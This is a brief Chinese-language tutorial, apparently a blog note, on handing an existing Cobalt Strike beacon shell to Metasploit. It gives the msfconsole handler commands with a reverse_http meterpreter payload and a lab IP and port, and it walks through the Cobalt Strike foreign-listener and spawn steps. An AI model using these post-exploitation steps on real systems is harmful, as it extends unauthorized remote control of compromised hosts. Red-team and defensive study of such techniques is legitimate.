Cobalt strike 派生shell给MSF,前提是要有beaconshell:
在msf使用监听模块,并设置相关选项:
use exploit/multi/handle
set payload windows/meterpreter/reverse_http
set lhost 10.6.18.56
set lport 4321
run -j
回到Cobalt strike中添加监听器payload为 windows/foreign/reverse_httpc,ip为msf的ip监听端口为msf监听的端口:
下面为刚创建的监听器:
选中要派生的shell右击spawn选择刚刚创建的监听器:
点击Choose
我是汉化版的叫增加会话,英文版为spawn,一样的。
回到msf,输入sessions -i 5 命令 ,我们可以看到获取到了meterpreter会话: